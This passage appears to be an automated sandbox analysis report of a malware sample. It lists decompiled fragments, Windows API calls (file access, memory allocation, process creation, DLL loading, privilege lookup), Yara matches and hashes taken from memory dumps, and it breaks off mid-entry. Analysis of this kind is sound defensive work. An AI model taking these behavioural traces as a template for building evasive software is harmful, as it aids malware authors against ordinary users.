                                                                                                                          • API String ID: 3899507212-0
                                                                                                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                          • Instruction ID: bf4187e38ed515452a76a24d05e88418ebf87a1f9c5c0c5d517d21230e680a96
                                                                                                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                          • Instruction Fuzzy Hash: DEE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934F8108BF5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0041A270(intOrPtr _a4, int _a8) {
                                                                                                                          				void* _t10;
                                                                                                                          
                                                                                                                          				_t5 = _a4;
                                                                                                                          				E0041AB20(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                                                                          				ExitProcess(_a8);
                                                                                                                          			}





                                                                                                                          APIs
                                                                                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A298
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ExitProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 621844428-0
                                                                                                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                          • Instruction ID: 654422823446a6dc42c61fec1171b68ac592b5503343b56bfda4b4a103558910
                                                                                                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                          • Instruction Fuzzy Hash: 1FD017726042187BD620EB99DC85FD777ADDF487A4F0180AABA1C6B242C531BA10CBE1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 58ae18251e286a487975354e091e46602f0bdb9aa7d09d2dc58ea3121462084e
                                                                                                                          • Instruction ID: 945a714f111609a382a60f3185fa051e5cbae16d842d86037fbe94dd3358aa8b
                                                                                                                          • Opcode Fuzzy Hash: 58ae18251e286a487975354e091e46602f0bdb9aa7d09d2dc58ea3121462084e
                                                                                                                          • Instruction Fuzzy Hash: 9CB09B71D014C5D5D711D7714608717795077D0741F16C061D1020681B4778C495F5B6
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          C-Code - Quality: 53%
                                                                                                                          			E00AAFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                                                          				void* _t7;
                                                                                                                          				intOrPtr _t9;
                                                                                                                          				intOrPtr _t10;
                                                                                                                          				intOrPtr* _t12;
                                                                                                                          				intOrPtr* _t13;
                                                                                                                          				intOrPtr _t14;
                                                                                                                          				intOrPtr* _t15;
                                                                                                                          
                                                                                                                          				_t13 = __edx;
                                                                                                                          				_push(_a4);
                                                                                                                          				_t14 =  *[fs:0x18];
                                                                                                                          				_t15 = _t12;
                                                                                                                          				_t7 = E00A5CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                                                          				_push(_t13);
                                                                                                                          				E00AA5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                                                          				_t9 =  *_t15;
                                                                                                                          				if(_t9 == 0xffffffff) {
                                                                                                                          					_t10 = 0;
                                                                                                                          				} else {
                                                                                                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                                                          				}
                                                                                                                          				_push(_t10);
                                                                                                                          				_push(_t15);
                                                                                                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                                                          				return E00AA5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                                                          			}











                                                                                                                          APIs
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AAFDFA
                                                                                                                          Strings
                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00AAFE2B
                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00AAFE01
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000007.00000002.562513240.00000000009F0000.00000040.00000001.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                          • API String ID: 885266447-3903918235
                                                                                                                          • Opcode ID: 8450b5c59ca4d8497f15a1edff2d2e58d60486d0c398ff573a9e38aa778ce993
                                                                                                                          • Instruction ID: 910e455111a69d8b8af75ac2cc0b27ebdce503809dccb35f03805d19378c1c70
                                                                                                                          • Opcode Fuzzy Hash: 8450b5c59ca4d8497f15a1edff2d2e58d60486d0c398ff573a9e38aa778ce993
                                                                                                                          • Instruction Fuzzy Hash: 39F0F632600601BFEA241A95DD06F37BF6AEB45730F240715F628565E1EA62F82097F4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Executed Functions

                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,02364B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02364B77,007A002E,00000000,00000060,00000000,00000000), ref: 02369F6D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: .z`
                                                                                                                          • API String ID: 823142352-1441809116
                                                                                                                          • Opcode ID: 83e15d0d1536b05d97b01dc0a6296594f924e01e243923ca3195c2d783ebab47
                                                                                                                          • Instruction ID: 1c2f18b85be975aea4d31c7ec3fbc4ca2de84104aad20580a0c7545da8bbe6e0
                                                                                                                          • Opcode Fuzzy Hash: 83e15d0d1536b05d97b01dc0a6296594f924e01e243923ca3195c2d783ebab47
                                                                                                                          • Instruction Fuzzy Hash: B801B2B2204108AFCB18CF98DC95EEB37EEAF8C754F158649BA1DD7251C630E811CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,02364B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02364B77,007A002E,00000000,00000060,00000000,00000000), ref: 02369F6D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: .z`
                                                                                                                          • API String ID: 823142352-1441809116
                                                                                                                          • Opcode ID: 40b7c4121765085cce412e3b304e513b3eb0290636f74b43cd85688f8fcaf1f7
                                                                                                                          • Instruction ID: fa593bc785d8c519b81054e9fde2e8a504708331436d641b75914fbf909b0e41
                                                                                                                          • Opcode Fuzzy Hash: 40b7c4121765085cce412e3b304e513b3eb0290636f74b43cd85688f8fcaf1f7
                                                                                                                          • Instruction Fuzzy Hash: 5701B2B2205108AFDB18CF98DC95EEB37AEAF8C754F158648FA1DD7240C630EC118BA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,02364B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02364B77,007A002E,00000000,00000060,00000000,00000000), ref: 02369F6D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: .z`
                                                                                                                          • API String ID: 823142352-1441809116
                                                                                                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                          • Instruction ID: 0de7e2c667fc447deed346ebef47bfad4fd5347776cace7e935ef42584aed8a8
                                                                                                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                          • Instruction Fuzzy Hash: DAF0B2B2200208ABCB08CF88DC94EEB77ADAF8C754F158248BA0D97240C630E8118BA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtClose.NTDLL(02364D10,?,?,02364D10,00000000,FFFFFFFF), ref: 0236A075
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3535843008-0
                                                                                                                          • Opcode ID: 253c5ad76745aedc14c6557aaf28ef044f9e8d0b7a0466cd19501b4d5afdb99b
                                                                                                                          • Instruction ID: 9c81dff3819a720ebc71eacbdea7a318cd00aa31f1c045c0e0bdebcf3f0848e4
                                                                                                                          • Opcode Fuzzy Hash: 253c5ad76745aedc14c6557aaf28ef044f9e8d0b7a0466cd19501b4d5afdb99b
                                                                                                                          • Instruction Fuzzy Hash: 93F05476200214AFD710EF98DC44EA777ADEF8C310F148559FA589B241C631E91587E0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtReadFile.NTDLL(02364D32,5EB6522D,FFFFFFFF,023649F1,?,?,02364D32,?,023649F1,FFFFFFFF,5EB6522D,02364D32,?,00000000), ref: 0236A015
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          • Opcode ID: e5acad5a1eddc461ee6f34251e3c72b1aa7f1d2ecebcdd1ba6ebf93cfc014c02
                                                                                                                          • Instruction ID: 21d7173b808e232ad8aa72db40f89494a165b38779d51464a84d93db047b1376
                                                                                                                          • Opcode Fuzzy Hash: e5acad5a1eddc461ee6f34251e3c72b1aa7f1d2ecebcdd1ba6ebf93cfc014c02
                                                                                                                          • Instruction Fuzzy Hash: 0EF0EC71200104ABDB14DF99DC50EEB77ADEF8C754F118249BE1DA7241D631E811CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtReadFile.NTDLL(02364D32,5EB6522D,FFFFFFFF,023649F1,?,?,02364D32,?,023649F1,FFFFFFFF,5EB6522D,02364D32,?,00000000), ref: 0236A015
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                          • Instruction ID: 1b1cbfe4ffc283bcb158ae8ff46097095451a0f7f42ff9e5cfdb4f0faea5207b
                                                                                                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                          • Instruction Fuzzy Hash: F7F0A4B2200208ABCB14DF89DC94EEB77ADAF8C754F158249BA1DA7241D630E8118BA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02352D11,00002000,00003000,00000004), ref: 0236A139
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2167126740-0
                                                                                                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                          • Instruction ID: d5224d23e433f57fb32ecd5b08a1aeb0169b006f4ff93efaa871f8b95f95c941
                                                                                                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                          • Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC90EAB77ADAF88750F118149BE08A7241C630F810CBE4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • NtClose.NTDLL(02364D10,?,?,02364D10,00000000,FFFFFFFF), ref: 0236A075
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3535843008-0
                                                                                                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                          • Instruction ID: 6163d88c6d12951e56401134e952fa8ec6dc991df4b04df2ac0868c64059eb07
                                                                                                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                          • Instruction Fuzzy Hash: 16D012752002146BD710EB98DC45FA7775DEF44750F154455BA185B241C530F90087E0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.585302576.0000000002D60000.00000040.00000001.sdmp, Offset: 02D60000, based on PE: true
                                                                                                                          • Associated: 00000011.00000002.585785150.0000000002E7B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000011.00000002.585807994.0000000002E7F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 4492c8ce4d93afab1a1f56ee6553ee077c48dc13ffd101341e1ab257e8d87f82
                                                                                                                          • Instruction ID: a1a9d5f1674afbffa2678d32d7f72fd94c46194f779b617799e52832c6153243
                                                                                                                          • Opcode Fuzzy Hash: 4492c8ce4d93afab1a1f56ee6553ee077c48dc13ffd101341e1ab257e8d87f82
                                                                                                                          • Instruction Fuzzy Hash: BC900262251C0046D60065AD4C14B07000697D4343F51C515A0144574CC9558CA16561
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.585302576.0000000002D60000.00000040.00000001.sdmp, Offset: 02D60000, based on PE: true
                                                                                                                          • Associated: 00000011.00000002.585785150.0000000002E7B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000011.00000002.585807994.0000000002E7F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 1fadef6bbbbbec9a3a8f117b4b03db2905423f656d21899ce2ffd9b14508580a
                                                                                                                          • Instruction ID: 00440bcc63d8d0a811b06a11b676dceda740d4bb0d94e6e26531774dd2ed1b52
                                                                                                                          • Opcode Fuzzy Hash: 1fadef6bbbbbec9a3a8f117b4b03db2905423f656d21899ce2ffd9b14508580a
                                                                                                                          • Instruction Fuzzy Hash: 64900262282441565945B19D44045074007A7E4281B91C412A1404970C85669C96E661
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.585302576.0000000002D60000.00000040.00000001.sdmp, Offset: 02D60000, based on PE: true
                                                                                                                          • Associated: 00000011.00000002.585785150.0000000002E7B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000011.00000002.585807994.0000000002E7F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.585302576.0000000002D60000.00000040.00000001.sdmp, Offset: 02D60000, based on PE: true
                                                                                                                          • Associated: 00000011.00000002.585785150.0000000002E7B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000011.00000002.585807994.0000000002E7F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.585302576.0000000002D60000.00000040.00000001.sdmp, Offset: 02D60000, based on PE: true
                                                                                                                          • Associated: 00000011.00000002.585785150.0000000002E7B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000011.00000002.585807994.0000000002E7F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.585302576.0000000002D60000.00000040.00000001.sdmp, Offset: 02D60000, based on PE: true
                                                                                                                          • Associated: 00000011.00000002.585785150.0000000002E7B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000011.00000002.585807994.0000000002E7F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.585302576.0000000002D60000.00000040.00000001.sdmp, Offset: 02D60000, based on PE: true
                                                                                                                          • Associated: 00000011.00000002.585785150.0000000002E7B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000011.00000002.585807994.0000000002E7F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.585302576.0000000002D60000.00000040.00000001.sdmp, Offset: 02D60000, based on PE: true
                                                                                                                          • Associated: 00000011.00000002.585785150.0000000002E7B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000011.00000002.585807994.0000000002E7F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.585302576.0000000002D60000.00000040.00000001.sdmp, Offset: 02D60000, based on PE: true
                                                                                                                          • Associated: 00000011.00000002.585785150.0000000002E7B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000011.00000002.585807994.0000000002E7F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.585302576.0000000002D60000.00000040.00000001.sdmp, Offset: 02D60000, based on PE: true
                                                                                                                          • Associated: 00000011.00000002.585785150.0000000002E7B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000011.00000002.585807994.0000000002E7F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.585302576.0000000002D60000.00000040.00000001.sdmp, Offset: 02D60000, based on PE: true
                                                                                                                          • Associated: 00000011.00000002.585785150.0000000002E7B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000011.00000002.585807994.0000000002E7F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.585302576.0000000002D60000.00000040.00000001.sdmp, Offset: 02D60000, based on PE: true
                                                                                                                          • Associated: 00000011.00000002.585785150.0000000002E7B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000011.00000002.585807994.0000000002E7F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.585302576.0000000002D60000.00000040.00000001.sdmp, Offset: 02D60000, based on PE: true
                                                                                                                          • Associated: 00000011.00000002.585785150.0000000002E7B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000011.00000002.585807994.0000000002E7F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.585302576.0000000002D60000.00000040.00000001.sdmp, Offset: 02D60000, based on PE: true
                                                                                                                          • Associated: 00000011.00000002.585785150.0000000002E7B000.00000040.00000001.sdmp
                                                                                                                          • Associated: 00000011.00000002.585807994.0000000002E7F000.00000040.00000001.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0235834A
                                                                                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0235836B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePostThread
                                                                                                                          • String ID: 3333
                                                                                                                          • API String ID: 1836367815-2924271548
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(000007D0), ref: 02368CE8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Sleep
                                                                                                                          • String ID: net.dll$wininet.dll
                                                                                                                          • API String ID: 3472027048-1269752229
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • Sleep.KERNELBASE(000007D0), ref: 02368CE8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Sleep
                                                                                                                          • String ID: net.dll$wininet.dll
                                                                                                                          • API String ID: 3472027048-1269752229
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02353AF8), ref: 0236A25D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID: .z`
                                                                                                                          • API String ID: 3298025750-1441809116
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0235834A
                                                                                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0235836B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePostThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1836367815-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0236A2F4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateInternalProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2186235152-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0235AD32
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Load
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2234796835-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0235AD32
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Load
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2234796835-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0236A2F4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateInternalProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2186235152-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0235F192,0235F192,?,00000000,?,?), ref: 0236A3C0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Offset: 02350000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
